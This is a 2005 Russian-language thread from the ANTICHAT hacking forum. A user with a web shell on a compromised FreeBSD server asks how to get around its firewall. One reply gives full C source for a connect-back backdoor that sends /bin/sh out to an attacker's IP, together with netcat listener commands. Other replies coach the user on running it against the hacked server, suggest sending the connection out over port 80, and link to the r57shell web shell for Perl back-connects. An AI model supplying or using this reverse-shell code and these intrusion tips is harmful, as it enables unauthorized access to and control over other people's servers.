ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обойти фаерволл в FreeBSD
  #1  
Старый 23.12.2005, 14:00
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме:
47924

Репутация: 0
Cool Обойти фаерволл в FreeBSD

Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
 
Ответить с цитированием

  #2  
Старый 23.12.2005, 16:03
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо).
:]
 
Ответить с цитированием

  #3  
Старый 23.12.2005, 18:26
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

scorpion, юзай Connect-Back Backdoor.
bdw.c
Цитата:
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>

#include <netinet/in.h>
#include <netdb.h>

int fd, sock;
int port = 4000;
struct sockaddr_in addr;

char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...\n";
char shell[] = "/bin/sh";

int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0);
}


addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);

if(connect(fd, (struct sockaddr*)&addr, sizeof(addr))<0)printf("fucker!\n");

send(fd, mesg, sizeof(mesg), 0);

dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);


close(fd);


return 1;
}
Есть еще пару способов, но этот самый простой...
 
Ответить с цитированием

  #4  
Старый 23.12.2005, 18:31
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Что-то я стормозил... Дейсвительно, так проще. :]
 
Ответить с цитированием

  #5  
Старый 24.12.2005, 00:09
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме:
47924

Репутация: 0
По умолчанию

Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации )))
 
Ответить с цитированием

  #6  
Старый 24.12.2005, 00:26
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме:
47924

Репутация: 0
По умолчанию

VIRGOZ

Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я???
 
Ответить с цитированием

  #7  
Старый 24.12.2005, 01:48
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
 
Ответить с цитированием

  #8  
Старый 26.12.2005, 15:02
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
Провел на форуме:
7298807

Репутация: 901


По умолчанию

Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит..
 
Ответить с цитированием

  #9  
Старый 29.12.2005, 01:26
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
Провел на форуме:
47924

Репутация: 0
По умолчанию

Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???

Где взять такой перл шелл???

P.S За хорошую помощь поднимаю репутацию всегда...
 
Ответить с цитированием

  #10  
Старый 29.12.2005, 03:10
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

А разве твой шел не от rst ?
Цитата:
Сообщение от r57shell v1.23  
bla bla bla
~ возможность делать back-connect с помощью Perl или С кода
bla bla bla
http://rst.void.ru/index.php?page=releases
http://rst.void.ru/download/r57shell.txt
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
xBSD books FRAGNATIC *nix 20 22.04.2008 18:02
Посоветуйте, что можно сделать на сервере FreeBSD, если... Mefisto *nix 22 18.04.2008 14:17
Подделка IP Ekstazi Уязвимости 6 11.10.2006 21:10
Как обойти сканер со значком ' Thief Форумы 2 21.04.2005 12:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ